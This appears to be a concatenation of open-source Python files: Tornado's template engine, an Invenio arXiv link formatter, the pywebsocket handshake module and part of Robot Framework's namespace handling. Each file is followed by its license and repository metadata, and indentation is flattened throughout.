def add(x, y):
return x + y
template.execute(add=add)
### The template
{{ add(1, 2) }}
We provide the functions `escape() <.xhtml_escape>`, `.url_escape()`,
`.json_encode()`, and `.squeeze()` to all templates by default.
Typical applications do not create `Template` or `Loader` instances by
hand, but instead use the `~.RequestHandler.render` and
`~.RequestHandler.render_string` methods of
`tornado.web.RequestHandler`, which load templates automatically based
on the ``template_path`` `.Application` setting.
Variable names beginning with ``_tt_`` are reserved by the template
system and should not be used by application code.
Syntax Reference
----------------
Template expressions are surrounded by double curly braces: ``{{ ... }}``.
The contents may be any python expression, which will be escaped according
to the current autoescape setting and inserted into the output. Other
template directives use ``{% %}``. These tags may be escaped as ``{{!``
and ``{%!`` if you need to include a literal ``{{`` or ``{%`` in the output.
To comment out a section so that it is omitted from the output, surround it
with ``{# ... #}``.
``{% apply *function* %}...{% end %}``
Applies a function to the output of all template code between ``apply``
and ``end``::
{% apply linkify %}{{name}} said: {{message}}{% end %}
Note that as an implementation detail apply blocks are implemented
as nested functions and thus may interact strangely with variables
set via ``{% set %}``, or the use of ``{% break %}`` or ``{% continue %}``
within loops.
``{% autoescape *function* %}``
Sets the autoescape mode for the current file. This does not affect
other files, even those referenced by ``{% include %}``. Note that
autoescaping can also be configured globally, at the `.Application`
or `Loader`.::
{% autoescape xhtml_escape %}
{% autoescape None %}
``{% block *name* %}...{% end %}``
Indicates a named, replaceable block for use with ``{% extends %}``.
Blocks in the parent template will be replaced with the contents of
the same-named block in a child template.::
<!-- base.html -->
<title>{% block title %}Default title{% end %}</title>
<!-- mypage.html -->
{% extends "base.html" %}
{% block title %}My page title{% end %}
``{% comment ... %}``
A comment which will be removed from the template output. Note that
there is no ``{% end %}`` tag; the comment goes from the word ``comment``
to the closing ``%}`` tag.
``{% extends *filename* %}``
Inherit from another template. Templates that use ``extends`` should
contain one or more ``block`` tags to replace content from the parent
template. Anything in the child template not contained in a ``block``
tag will be ignored. For an example, see the ``{% block %}`` tag.
``{% for *var* in *expr* %}...{% end %}``
Same as the python ``for`` statement. ``{% break %}`` and
``{% continue %}`` may be used inside the loop.
``{% from *x* import *y* %}``
Same as the python ``import`` statement.
``{% if *condition* %}...{% elif *condition* %}...{% else %}...{% end %}``
Conditional statement - outputs the first section whose condition is
true. (The ``elif`` and ``else`` sections are optional)
``{% import *module* %}``
Same as the python ``import`` statement.
``{% include *filename* %}``
Includes another template file. The included file can see all the local
variables as if it were copied directly to the point of the ``include``
directive (the ``{% autoescape %}`` directive is an exception).
Alternately, ``{% module Template(filename, **kwargs) %}`` may be used
to include another template with an isolated namespace.
``{% module *expr* %}``
Renders a `~tornado.web.UIModule`. The output of the ``UIModule`` is
not escaped::
{% module Template("foo.html", arg=42) %}
``UIModules`` are a feature of the `tornado.web.RequestHandler`
class (and specifically its ``render`` method) and will not work
when the template system is used on its own in other contexts.
``{% raw *expr* %}``
Outputs the result of the given expression without autoescaping.
``{% set *x* = *y* %}``
Sets a local variable.
``{% try %}...{% except %}...{% else %}...{% finally %}...{% end %}``
Same as the python ``try`` statement.
``{% while *condition* %}... {% end %}``
Same as the python ``while`` statement. ``{% break %}`` and
``{% continue %}`` may be used inside the loop.
"""
from __future__ import absolute_import, division, print_function, with_statement
import datetime
import linecache
import os.path
import posixpath
import re
import threading
from tornado import escape
from tornado.log import app_log
from tornado.util import ObjectDict, exec_in, unicode_type
try:
from cStringIO import StringIO # py2
except ImportError:
from io import StringIO # py3
_DEFAULT_AUTOESCAPE = "xhtml_escape"
_UNSET = object()
class Template(object):
"""A compiled template.
We compile into Python from the given template_string. You can generate
the template from variables with generate().
"""
# note that the constructor's signature is not extracted with
# autodoc because _UNSET looks like garbage. When changing
# this signature update website/sphinx/template.rst too.
def __init__(self, template_string, name="<string>", loader=None,
compress_whitespace=None, autoescape=_UNSET):
self.name = name
if compress_whitespace is None:
compress_whitespace = name.endswith(".html") or \
name.endswith(".js")
if autoescape is not _UNSET:
self.autoescape = autoescape
elif loader:
self.autoescape = loader.autoescape
else:
self.autoescape = _DEFAULT_AUTOESCAPE
self.namespace = loader.namespace if loader else {}
reader = _TemplateReader(name, escape.native_str(template_string))
self.file = _File(self, _parse(reader, self))
self.code = self._generate_python(loader, compress_whitespace)
self.loader = loader
try:
# Under python2.5, the fake filename used here must match
# the module name used in __name__ below.
# The dont_inherit flag prevents template.py's future imports
# from being applied to the generated code.
self.compiled = compile(
escape.to_unicode(self.code),
"%s.generated.py" % self.name.replace('.', '_'),
"exec", dont_inherit=True)
except Exception:
formatted_code = _format_code(self.code).rstrip()
app_log.error("%s code:\n%s", self.name, formatted_code)
raise
def generate(self, **kwargs):
"""Generate this template with the given arguments."""
namespace = {
"escape": escape.xhtml_escape,
"xhtml_escape": escape.xhtml_escape,
"url_escape": escape.url_escape,
"json_encode": escape.json_encode,
"squeeze": escape.squeeze,
"linkify": escape.linkify,
"datetime": datetime,
"_tt_utf8": escape.utf8, # for internal use
"_tt_string_types": (unicode_type, bytes),
# __name__ and __loader__ allow the traceback mechanism to find
# the generated source code.
"__name__": self.name.replace('.', '_'),
"__loader__": ObjectDict(get_source=lambda name: self.code),
}
namespace.update(self.namespace)
namespace.update(kwargs)
exec_in(self.compiled, namespace)
execute = namespace["_tt_execute"]
# Clear the traceback module's cache of source data now that
# we've generated a new template (mainly for this module's
# unittests, where different tests reuse the same name).
linecache.clearcache()
return execute()
def _generate_python(self, loader, compress_whitespace):
buffer = StringIO()
try:
# named_blocks maps from names to _NamedBlock objects
named_blocks = {}
ancestors = self._get_ancestors(loader)
ancestors.reverse()
for ancestor in ancestors:
ancestor.find_named_blocks(loader, named_blocks)
writer = _CodeWriter(buffer, named_blocks, loader, ancestors[0].template,
compress_whitespace)
ancestors[0].generate(writer)
return buffer.getvalue()
finally:
buffer.close()
def _get_ancestors(self, loader):
ancestors = [self.file]
for chunk in self.file.body.chunks:
if isinstance(chunk, _ExtendsBlock):
if not loader:
raise ParseError("{% extends %} block found, but no "
"template loader")
template = loader.load(chunk.name, self.name)
ancestors.extend(template._get_ancestors(loader))
return ancestors
class BaseLoader(object):
"""Base class for template loaders.
You must use a template loader to use template constructs like
``{% extends %}`` and ``{% include %}``. The loader caches all
templates after they are loaded the first time.
"""
def __init__(self, autoescape=_DEFAULT_AUTOESCAPE, namespace=None):
"""``autoescape`` must be either None or a string naming a function
in the template namespace, such as "xhtml_escape".
"""
self.autoescape = autoescape
self.namespace = namespace or {}
self.templates = {}
# self.lock protects self.templates. It's a reentrant lock
# because templates may load other templates via `include` or
# `extends`. Note that thanks to the GIL this code would be safe
# even without the lock, but could lead to wasted work as multiple
# threads tried to compile the same template simultaneously.
self.lock = threading.RLock()
def reset(self):
"""Resets the cache of compiled templates."""
with self.lock:
self.templates = {}
def resolve_path(self, name, parent_path=None):
"""Converts a possibly-relative path to absolute (used internally)."""
raise NotImplementedError()
def load(self, name, parent_path=None):
"""Loads a template."""
name = self.resolve_path(name, parent_path=parent_path)
with self.lock:
if name not in self.templates:
self.templates[name] = self._create_template(name)
return self.templates[name]
def _create_template(self, name):
raise NotImplementedError()
class Loader(BaseLoader):
"""A template loader that loads from a single root directory.
"""
def __init__(self, root_directory, **kwargs):
super(Loader, self).__init__(**kwargs)
self.root = os.path.abspath(root_directory)
def resolve_path(self, name, parent_path=None):
if parent_path and not parent_path.startswith("<") and \
not parent_path.startswith("/") and \
not name.startswith("/"):
current_path = os.path.join(self.root, parent_path)
file_dir = os.path.dirname(os.path.abspath(current_path))
relative_path = os.path.abspath(os.path.join(file_dir, name))
if relative_path.startswith(self.root):
name = relative_path[len(self.root) + 1:]
return name
def _create_template(self, name):
path = os.path.join(self.root, name)
with open(path, "rb") as f:
template = Template(f.read(), name=name, loader=self)
return template
class DictLoader(BaseLoader):
"""A template loader that loads from a dictionary."""
def __init__(self, dict, **kwargs):
super(DictLoader, self).__init__(**kwargs)
self.dict = dict
def resolve_path(self, name, parent_path=None):
if parent_path and not parent_path.startswith("<") and \
not parent_path.startswith("/") and \
not name.startswith("/"):
file_dir = posixpath.dirname(parent_path)
name = posixpath.normpath(posixpath.join(file_dir, name))
return name
def _create_template(self, name):
return Template(self.dict[name], name=name, loader=self)
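# --- Illustrative sketch (not in the original source): a minimal DictLoader
# use of the {% extends %}/{% block %} syntax described in the module
# docstring.  The template names "base.html" and "page.html" are examples.
#
#     loader = DictLoader({
#         "base.html": "<title>{% block title %}Default{% end %}</title>",
#         "page.html": '{% extends "base.html" %}'
#                      '{% block title %}My page{% end %}',
#     })
#     print(loader.load("page.html").generate())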
class _Node(object):
def each_child(self):
return ()
def generate(self, writer):
raise NotImplementedError()
def find_named_blocks(self, loader, named_blocks):
for child in self.each_child():
child.find_named_blocks(loader, named_blocks)
class _File(_Node):
def __init__(self, template, body):
self.template = template
self.body = body
self.line = 0
def generate(self, writer):
writer.write_line("def _tt_execute():", self.line)
with writer.indent():
writer.write_line("_tt_buffer = []", self.line)
writer.write_line("_tt_append = _tt_buffer.append", self.line)
self.body.generate(writer)
writer.write_line("return _tt_utf8('').join(_tt_buffer)", self.line)
def each_child(self):
return (self.body,)
class _ChunkList(_Node):
def __init__(self, chunks):
self.chunks = chunks
def generate(self, writer):
for chunk in self.chunks:
chunk.generate(writer)
def each_child(self):
return self.chunks
class _NamedBlock(_Node):
def __init__(self, name, body, template, line):
self.name = name
self.body = body
self.template = template
self.line = line
def each_child(self):
return (self.body,)
def generate(self, writer):
block = writer.named_blocks[self.name]
with writer.include(block.template, self.line):
block.body.generate(writer)
def find_named_blocks(self, loader, named_blocks):
named_blocks[self.name] = self
_Node.find_named_blocks(self, loader, named_blocks)
class _ExtendsBlock(_Node):
def __init__(self, name):
self.name = name
class _IncludeBlock(_Node):
def __init__(self, name, reader, line):
self.name = name
self.template_name = reader.name
self.line = line
def find_named_blocks(self, loader, named_blocks):
included = loader.load(self.name, self.template_name)
included.file.find_named_blocks(loader, named_blocks)
def generate(self, writer):
included = writer.loader.load(self.name, self.template_name)
with writer.include(included, self.line):
included.file.body.generate(writer)
class _ApplyBlock(_Node):
def __init__(self, method, line, body=None):
self.method = method
self.line = line
self.body = body
def each_child(self):
return (self.body,)
def generate(self, writer):
method_name = "_tt_apply%d" % writer.apply_counter
writer.apply_counter += 1
writer.write_line("def %s():" % method_name, self.line)
with writer.indent():
writer.write_line("_tt_buffer = []", self.line)
writer.write_line("_tt_append = _tt_buffer.append", self.line)
self.body.generate(writer)
writer.write_line("return _tt_utf8('').join(_tt_buffer)", self.line)
writer.write_line("_tt_append(_tt_utf8(%s(%s())))" % (
self.method, method_name), self.line)
class _ControlBlock(_Node):
def __init__(self, statement, line, body=None):
self.statement = statement
self.line = line
self.body = body
def each_child(self):
return (self.body,)
def generate(self, writer):
writer.write_line("%s:" % self.statement, self.line)
with writer.indent():
self.body.generate(writer)
# Just in case the body was empty
writer.write_line("pass", self.line)
class _IntermediateControlBlock(_Node):
def __init__(self, statement, line):
self.statement = statement
self.line = line
def generate(self, writer):
# In case the previous block was empty
writer.write_line("pass", self.line)
writer.write_line("%s:" % self.statement, self.line, writer.indent_size() - 1)
class _Statement(_Node):
def __init__(self, statement, line):
self.statement = statement
self.line = line
def generate(self, writer):
writer.write_line(self.statement, self.line)
class _Expression(_Node):
def __init__(self, expression, line, raw=False):
self.expression = expression
self.line = line
self.raw = raw
def generate(self, writer):
writer.write_line("_tt_tmp = %s" % self.expression, self.line)
writer.write_line("if isinstance(_tt_tmp, _tt_string_types):"
" _tt_tmp = _tt_utf8(_tt_tmp)", self.line)
writer.write_line("else: _tt_tmp = _tt_utf8(str(_tt_tmp))", self.line)
if not self.raw and writer.current_template.autoescape is not None:
# In python3 functions like xhtml_escape return unicode,
# so we have to convert to utf8 again.
writer.write_line("_tt_tmp = _tt_utf8(%s(_tt_tmp))" %
writer.current_template.autoescape, self.line)
writer.write_line("_tt_append(_tt_tmp)", self.line)
class _Module(_Expression):
def __init__(self, expression, line):
super(_Module, self).__init__("_tt_modules." + expression, line,
raw=True)
class _Text(_Node):
def __init__(self, value, line):
self.value = value
self.line = line
def generate(self, writer):
value = self.value
# Compress lots of white space to a single character. If the whitespace
# breaks a line, have it continue to break a line, but just with a
# single \n character
if writer.compress_whitespace and "<pre>" not in value:
value = re.sub(r"([\t ]+)", " ", value)
value = re.sub(r"(\s*\n\s*)", "\n", value)
if value:
writer.write_line('_tt_append(%r)' % escape.utf8(value), self.line)
class ParseError(Exception):
"""Raised for template syntax errors."""
pass
class _CodeWriter(object):
def __init__(self, file, named_blocks, loader, current_template,
compress_whitespace):
self.file = file
self.named_blocks = named_blocks
self.loader = loader
self.current_template = current_template
self.compress_whitespace = compress_whitespace
self.apply_counter = 0
self.include_stack = []
self._indent = 0
def indent_size(self):
return self._indent
def indent(self):
class Indenter(object):
def __enter__(_):
self._indent += 1
return self
def __exit__(_, *args):
assert self._indent > 0
self._indent -= 1
return Indenter()
def include(self, template, line):
self.include_stack.append((self.current_template, line))
self.current_template = template
class IncludeTemplate(object):
def __enter__(_):
return self
def __exit__(_, *args):
self.current_template = self.include_stack.pop()[0]
return IncludeTemplate()
def write_line(self, line, line_number, indent=None):
if indent is None:
indent = self._indent
line_comment = ' # %s:%d' % (self.current_template.name, line_number)
if self.include_stack:
ancestors = ["%s:%d" % (tmpl.name, lineno)
for (tmpl, lineno) in self.include_stack]
line_comment += ' (via %s)' % ', '.join(reversed(ancestors))
print(" " * indent + line + line_comment, file=self.file)
class _TemplateReader(object):
def __init__(self, name, text):
self.name = name
self.text = text
self.line = 1
self.pos = 0
def find(self, needle, start=0, end=None):
assert start >= 0, start
pos = self.pos
start += pos
if end is None:
index = self.text.find(needle, start)
else:
end += pos
assert end >= start
index = self.text.find(needle, start, end)
if index != -1:
index -= pos
return index
def consume(self, count=None):
if count is None:
count = len(self.text) - self.pos
newpos = self.pos + count
self.line += self.text.count("\n", self.pos, newpos)
s = self.text[self.pos:newpos]
self.pos = newpos
return s
def remaining(self):
return len(self.text) - self.pos
def __len__(self):
return self.remaining()
def __getitem__(self, key):
if type(key) is slice:
size = len(self)
start, stop, step = key.indices(size)
if start is None:
start = self.pos
else:
start += self.pos
if stop is not None:
stop += self.pos
return self.text[slice(start, stop, step)]
elif key < 0:
return self.text[key]
else:
return self.text[self.pos + key]
def __str__(self):
return self.text[self.pos:]
def _format_code(code):
lines = code.splitlines()
format = "%%%dd %%s\n" % len(repr(len(lines) + 1))
return "".join([format % (i + 1, line) for (i, line) in enumerate(lines)])
def _parse(reader, template, in_block=None, in_loop=None):
body = _ChunkList([])
while True:
# Find next template directive
curly = 0
while True:
curly = reader.find("{", curly)
if curly == -1 or curly + 1 == reader.remaining():
# EOF
if in_block:
raise ParseError("Missing {%% end %%} block for %s" %
in_block)
body.chunks.append(_Text(reader.consume(), reader.line))
return body
# If the first curly brace is not the start of a special token,
# start searching from the character after it
if reader[curly + 1] not in ("{", "%", "#"):
curly += 1
continue
# When there are more than 2 curlies in a row, use the
# innermost ones. This is useful when generating languages
# like latex where curlies are also meaningful
if (curly + 2 < reader.remaining() and
reader[curly + 1] == '{' and reader[curly + 2] == '{'):
curly += 1
continue
break
# Append any text before the special token
if curly > 0:
cons = reader.consume(curly)
body.chunks.append(_Text(cons, reader.line))
start_brace = reader.consume(2)
line = reader.line
# Template directives may be escaped as "{{!" or "{%!".
# In this case output the braces and consume the "!".
# This is especially useful in conjunction with jquery templates,
# which also use double curly braces.
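# (Editor's note) For example, the template text "{{! name }}" is emitted
# literally as "{{ name }}" in the rendered output.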
if reader.remaining() and reader[0] == "!":
reader.consume(1)
body.chunks.append(_Text(start_brace, line))
continue
# Comment
if start_brace == "{#":
end = reader.find("#}")
if end == -1:
raise ParseError("Missing end expression #} on line %d" % line)
contents = reader.consume(end).strip()
reader.consume(2)
continue
# Expression
if start_brace == "{{":
end = reader.find("}}")
if end == -1:
raise ParseError("Missing end expression }} on line %d" % line)
contents = reader.consume(end).strip()
reader.consume(2)
if not contents:
raise ParseError("Empty expression on line %d" % line)
body.chunks.append(_Expression(contents, line))
continue
# Block
assert start_brace == "{%", start_brace
end = reader.find("%}")
if end == -1:
raise ParseError("Missing end block %%} on line %d" % line)
contents = reader.consume(end).strip()
reader.consume(2)
if not contents:
raise ParseError("Empty block tag ({%% %%}) on line %d" % line)
operator, space, suffix = contents.partition(" ")
suffix = suffix.strip()
# Intermediate ("else", "elif", etc) blocks
intermediate_blocks = {
"else": set(["if", "for", "while", "try"]),
"elif": set(["if"]),
"except": set(["try"]),
"finally": set(["try"]),
}
allowed_parents = intermediate_blocks.get(operator)
if allowed_parents is not None:
if not in_block:
raise ParseError("%s outside %s block" %
(operator, allowed_parents))
if in_block not in allowed_parents:
raise ParseError("%s block cannot be attached to %s block" % (operator, in_block))
body.chunks.append(_IntermediateControlBlock(contents, line))
continue
# End tag
elif operator == "end":
if not in_block:
raise ParseError("Extra {%% end %%} block on line %d" % line)
return body
elif operator in ("extends", "include", "set", "import", "from",
"comment", "autoescape", "raw", "module"):
if operator == "comment":
continue
if operator == "extends":
suffix = suffix.strip('"').strip("'")
if not suffix:
raise ParseError("extends missing file path on line %d" % line)
block = _ExtendsBlock(suffix)
elif operator in ("import", "from"):
if not suffix:
raise ParseError("import missing statement on line %d" % line)
block = _Statement(contents, line)
elif operator == "include":
suffix = suffix.strip('"').strip("'")
if not suffix:
raise ParseError("include missing file path on line %d" % line)
block = _IncludeBlock(suffix, reader, line)
elif operator == "set":
if not suffix:
raise ParseError("set missing statement on line %d" % line)
block = _Statement(suffix, line)
elif operator == "autoescape":
fn = suffix.strip()
if fn == "None":
fn = None
template.autoescape = fn
continue
elif operator == "raw":
block = _Expression(suffix, line, raw=True)
elif operator == "module":
block = _Module(suffix, line)
body.chunks.append(block)
continue
elif operator in ("apply", "block", "try", "if", "for", "while"):
# parse inner body recursively
if operator in ("for", "while"):
block_body = _parse(reader, template, operator, operator)
elif operator == "apply":
# apply creates a nested function so syntactically it's not
# in the loop.
block_body = _parse(reader, template, operator, None)
else:
block_body = _parse(reader, template, operator, in_loop)
if operator == "apply":
if not suffix:
raise ParseError("apply missing method name on line %d" % line)
block = _ApplyBlock(suffix, line, block_body)
elif operator == "block":
if not suffix:
raise ParseError("block missing name on line %d" % line)
block = _NamedBlock(suffix, block_body, template, line)
else:
block = _ControlBlock(contents, line, block_body)
body.chunks.append(block)
continue
elif operator in ("break", "continue"):
if not in_loop:
raise ParseError("%s outside %s block" % (operator, set(["for", "while"])))
body.chunks.append(_Statement(contents, line))
continue
else:
raise ParseError("unknown operator: %r" % operator)
|
gpl-3.0
|
SDSG-Invenio/invenio
|
invenio/modules/formatter/format_elements/bfe_arxiv_link.py
|
13
|
1776
|
# This file is part of Invenio.
# Copyright (C) 2014 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""BibFormat element - Links to arXiv"""
from cgi import escape
from invenio.base.i18n import gettext_set_language
def format_element(bfo, tag="037__", target="_blank"):
"""
Extracts the arXiv preprint information and
presents it as a direct link towards arXiv.org
"""
_ = gettext_set_language(bfo.lang)
potential_arxiv_ids = bfo.fields(tag)
arxiv_id = ""
for potential_arxiv_id in potential_arxiv_ids:
if potential_arxiv_id.get('9') == 'arXiv' and potential_arxiv_id.get('a', '').startswith('arXiv:'):
arxiv_id = potential_arxiv_id['a'][len('arXiv:'):]
return '<a href="http://arxiv.org/abs/%s" target="%s" alt="%s">%s</a>' % (
escape(arxiv_id, True),
escape(target, True),
escape(_("This article on arXiv.org"), True),
escape(arxiv_id))
return ""
def escape_values(bfo):
"""
Called by BibFormat in order to check if output of this element
should be escaped.
"""
return 0
|
gpl-2.0
|
jgraham/servo
|
tests/wpt/web-platform-tests/tools/pywebsocket/src/mod_pywebsocket/handshake/__init__.py
|
658
|
4406
|
# Copyright 2011, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""WebSocket opening handshake processor. This class try to apply available
opening handshake processors for each protocol version until a connection is
successfully established.
"""
import logging
from mod_pywebsocket import common
from mod_pywebsocket.handshake import hybi00
from mod_pywebsocket.handshake import hybi
# Export AbortedByUserException, HandshakeException, and VersionException
# symbol from this module.
from mod_pywebsocket.handshake._base import AbortedByUserException
from mod_pywebsocket.handshake._base import HandshakeException
from mod_pywebsocket.handshake._base import VersionException
_LOGGER = logging.getLogger(__name__)
def do_handshake(request, dispatcher, allowDraft75=False, strict=False):
"""Performs WebSocket handshake.
Args:
request: mod_python request.
dispatcher: Dispatcher (dispatch.Dispatcher).
allowDraft75: obsolete argument. Ignored.
strict: obsolete argument. Ignored.
The handshaker will add attributes such as ws_resource to the request
while performing the handshake.
"""
_LOGGER.debug('Client\'s opening handshake resource: %r', request.uri)
# To print mimetools.Message as an escaped one-line string, we convert
# headers_in to a dict. Without the conversion, %r just prints the type
# and address, and %s prints the original header string as multiple
# lines.
#
# Both mimetools.Message and mod_python's MpTable_Type can be converted
# to dict.
#
# mimetools.Message.__str__ returns the original header string, while
# dict(mimetools.Message object) returns the map from header names to
# header values. MpTable_Type has no such __str__, only a __repr__ that
# formats it like a dictionary object.
_LOGGER.debug(
'Client\'s opening handshake headers: %r', dict(request.headers_in))
handshakers = []
handshakers.append(
('RFC 6455', hybi.Handshaker(request, dispatcher)))
handshakers.append(
('HyBi 00', hybi00.Handshaker(request, dispatcher)))
for name, handshaker in handshakers:
_LOGGER.debug('Trying protocol version %s', name)
try:
handshaker.do_handshake()
_LOGGER.info('Established (%s protocol)', name)
return
except HandshakeException, e:
_LOGGER.debug(
'Failed to complete opening handshake as %s protocol: %r',
name, e)
if e.status:
raise e
except AbortedByUserException, e:
raise
except VersionException, e:
raise
# TODO(toyoshim): Add a test to cover the case all handshakers fail.
raise HandshakeException(
'Failed to complete opening handshake for all available protocols',
status=common.HTTP_STATUS_BAD_REQUEST)
# vi:sts=4 sw=4 et
|
mpl-2.0
|
alexandrul-ci/robotframework
|
src/robot/running/namespace.py
|
2
|
18101
|
# Copyright 2008-2015 Nokia Networks
# Copyright 2016- Robot Framework Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import copy
from itertools import chain
from robot.errors import DataError
from robot.libraries import STDLIBS
from robot.output import LOGGER, Message
from robot.parsing.settings import Library, Variables, Resource
from robot.utils import (eq, find_file, is_string, OrderedDict, printable_name,
seq2str2, RecommendationFinder)
from .usererrorhandler import UserErrorHandler
from .userkeyword import UserLibrary
from .importer import Importer, ImportCache
from .runkwregister import RUN_KW_REGISTER
IMPORTER = Importer()
class Namespace(object):
_default_libraries = ('BuiltIn', 'Reserved', 'Easter')
_library_import_by_path_endings = ('.py', '.java', '.class', '/', os.sep)
def __init__(self, variables, suite, resource):
LOGGER.info("Initializing namespace for test suite '%s'" % suite.longname)
self.variables = variables
self._imports = resource.imports
self._kw_store = KeywordStore(resource)
self._imported_variable_files = ImportCache()
self._suite_name = suite.longname
self._running_test = False
@property
def libraries(self):
return self._kw_store.libraries.values()
def handle_imports(self):
self._import_default_libraries()
self._handle_imports(self._imports)
def _import_default_libraries(self):
for name in self._default_libraries:
self.import_library(name, notify=name == 'BuiltIn')
def _handle_imports(self, import_settings):
for item in import_settings:
try:
if not item.name:
raise DataError('%s setting requires a name' % item.type)
self._import(item)
except DataError as err:
item.report_invalid_syntax(err.message)
def _import(self, import_setting):
action = {'Library': self._import_library,
'Resource': self._import_resource,
'Variables': self._import_variables}[import_setting.type]
action(import_setting)
def import_resource(self, name, overwrite=True):
self._import_resource(Resource(None, name), overwrite=overwrite)
def _import_resource(self, import_setting, overwrite=False):
path = self._resolve_name(import_setting)
self._validate_not_importing_init_file(path)
if overwrite or path not in self._kw_store.resources:
resource = IMPORTER.import_resource(path)
self.variables.set_from_variable_table(resource.variables, overwrite)
user_library = UserLibrary(resource)
self._kw_store.resources[path] = user_library
self._handle_imports(resource.imports)
LOGGER.imported("Resource", user_library.name,
importer=import_setting.source,
source=path)
else:
LOGGER.info("Resource file '%s' already imported by suite '%s'"
% (path, self._suite_name))
def _validate_not_importing_init_file(self, path):
name = os.path.splitext(os.path.basename(path))[0]
if name.lower() == '__init__':
raise DataError("Initialization file '%s' cannot be imported as "
"a resource file." % path)
def import_variables(self, name, args, overwrite=False):
self._import_variables(Variables(None, name, args), overwrite)
def _import_variables(self, import_setting, overwrite=False):
path = self._resolve_name(import_setting)
args = self._resolve_args(import_setting)
if overwrite or (path, args) not in self._imported_variable_files:
self._imported_variable_files.add((path, args))
self.variables.set_from_file(path, args, overwrite)
LOGGER.imported("Variables", os.path.basename(path),
args=list(args),
importer=import_setting.source,
source=path)
else:
msg = "Variable file '%s'" % path
if args:
msg += " with arguments %s" % seq2str2(args)
LOGGER.info("%s already imported by suite '%s'"
% (msg, self._suite_name))
def import_library(self, name, args=None, alias=None, notify=True):
self._import_library(Library(None, name, args=args, alias=alias),
notify=notify)
def _import_library(self, import_setting, notify=True):
name = self._resolve_name(import_setting)
lib = IMPORTER.import_library(name, import_setting.args,
import_setting.alias, self.variables)
if lib.name in self._kw_store.libraries:
LOGGER.info("Test library '%s' already imported by suite '%s'"
% (lib.name, self._suite_name))
return
if notify:
LOGGER.imported("Library", lib.name,
args=list(import_setting.args),
originalname=lib.orig_name,
importer=import_setting.source,
source=lib.source)
self._kw_store.libraries[lib.name] = lib
lib.start_suite()
if self._running_test:
lib.start_test()
def _resolve_name(self, import_setting):
name = import_setting.name
try:
name = self.variables.replace_string(name)
except DataError as err:
self._raise_replacing_vars_failed(import_setting, err)
return self._get_name(name, import_setting)
def _raise_replacing_vars_failed(self, import_setting, err):
raise DataError("Replacing variables from setting '%s' failed: %s"
% (import_setting.type, err.message))
def _get_name(self, name, import_setting):
if import_setting.type == 'Library' and not self._is_library_by_path(name):
if ' ' in name:
# TODO: Remove support for extra spaces in name in RF 3.1.
# https://github.com/robotframework/robotframework/issues/2264
warning = ("Importing library with extra spaces in name like "
"'%s' is deprecated. Remove spaces and use '%s' "
"instead." % (name, name.replace(' ', '')))
import_setting.report_invalid_syntax(warning, 'WARN')
name = name.replace(' ', '')
return name
return find_file(name, import_setting.directory,
file_type=import_setting.type)
def _is_library_by_path(self, path):
return path.lower().endswith(self._library_import_by_path_endings)
def _resolve_args(self, import_setting):
try:
return self.variables.replace_list(import_setting.args)
except DataError as err:
self._raise_replacing_vars_failed(import_setting, err)
def set_search_order(self, new_order):
old_order = self._kw_store.search_order
self._kw_store.search_order = new_order
return old_order
def start_test(self):
self._running_test = True
self.variables.start_test()
for lib in self.libraries:
lib.start_test()
def end_test(self):
self.variables.end_test()
for lib in self.libraries:
lib.end_test()
self._running_test = False
def start_suite(self):
self.variables.start_suite()
def end_suite(self):
self.variables.end_suite()
for lib in self.libraries:
lib.end_suite()
def start_user_keyword(self):
self.variables.start_keyword()
def end_user_keyword(self):
self.variables.end_keyword()
def get_library_instance(self, libname):
return self._kw_store.get_library(libname).get_instance()
def get_library_instances(self):
return dict((name, lib.get_instance())
for name, lib in self._kw_store.libraries.items())
def reload_library(self, libname_or_instance):
library = self._kw_store.get_library(libname_or_instance)
library.reload()
return library
def get_runner(self, name):
try:
return self._kw_store.get_runner(name)
except DataError as err:
return UserErrorHandler(name, err.message)
class KeywordStore(object):
def __init__(self, resource):
self.user_keywords = UserLibrary(resource,
UserLibrary.TEST_CASE_FILE_TYPE)
self.libraries = OrderedDict()
self.resources = ImportCache()
self.search_order = ()
def get_library(self, name_or_instance):
if name_or_instance is None:
raise DataError("Library can not be None.")
if is_string(name_or_instance):
return self._get_lib_by_name(name_or_instance)
